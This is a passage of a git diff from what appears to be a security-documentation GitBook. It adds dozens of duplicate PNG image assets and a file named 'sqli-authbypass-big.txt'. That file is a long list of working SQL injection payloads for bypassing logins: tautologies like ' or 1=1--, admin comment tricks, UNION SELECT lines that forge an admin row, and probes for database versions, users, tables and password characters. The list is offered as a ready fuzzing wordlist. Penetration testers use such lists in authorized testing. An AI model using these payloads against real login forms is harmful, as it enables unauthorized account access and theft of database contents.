(2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png differ diff --git a/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png new file mode 100644 index 000000000..687c4435f Binary files /dev/null and b/.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png differ diff --git a/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png new file mode 100644 index 000000000..5ec5cf81e Binary files /dev/null and b/.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (8).png differ diff --git a/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png new file mode 100644 index 000000000..50fcd35cf Binary files /dev/null and b/.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (9).png differ diff --git a/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..98efc7f5c Binary files /dev/null and b/.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..e2fc218f9 Binary files /dev/null and b/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..e2fc218f9 Binary files /dev/null and b/.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (10).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (10).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (10).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (11).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (11).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (11).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (12).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (12).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (12).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (13).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (13).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (13).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (14).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (14).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (14).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (15).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (15).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (15).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (16).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (16).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (16).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (3).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (3).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (3).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (4).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (4).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (4).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (5).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (5).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (5).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (6).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (6).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (6).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (7).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (7).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (7).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (8).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (8).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (8).png differ diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (9).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (9).png new file mode 100644 index 000000000..8b7813787 Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (9).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png new file mode 100644 index 000000000..4e69d4e12 Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png differ diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt new file mode 100644 index 000000000..5a03da57f --- /dev/null +++ b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt @@ -0,0 +1,771 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 + +== += +' +" +'-- 2 +'/* +'# +"-- 2 